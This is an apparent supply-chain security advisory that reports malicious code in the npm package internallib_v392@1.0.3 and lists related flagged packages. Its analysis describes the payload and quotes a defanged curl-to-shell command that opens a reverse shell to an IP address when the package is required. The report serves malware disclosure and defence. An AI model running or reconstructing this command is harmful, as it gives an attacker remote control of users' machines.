LWA-2026-11042 confirmed malware
internallib_v392@1.0.3
Malicious code in internallib_v392 (npm)
T1059.007 · JavaScriptT1071.001 · Web ProtocolsT1105 · Ingress Tool Transfer
Analysis
The package's index.js exports a command() function that executes a reverse shell via `curl hxxps://reverse-shell[.]sh/10[.]0[.]72[.]234:443|sh` through /bin/bash. The bundled check.js requires the package and invokes command(), and the included .gitlab-ci.yml runs `node check.js`, so requiring the package establishes a reverse shell to 10[.]0[.]72[.]234:443 via the reverse-shell.sh service.
- analyzed by
- Leitwacht
- first seen
- Aug 12, 2026, 01:21 PM
- analyzed
- Aug 12, 2026, 01:21 PM
Related advisories
- prediction-trader@2.3.0
- external-process-live-log@13.5.2
- kit-map-vim@1.0.0
- velora-kit@12.0.2
- node-config-svg-contract@1.0.0
- dakumangalsingh@1.0.0
- internallib_v164@1.0.7
- minimalistic-assert-plus@1.1.7
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.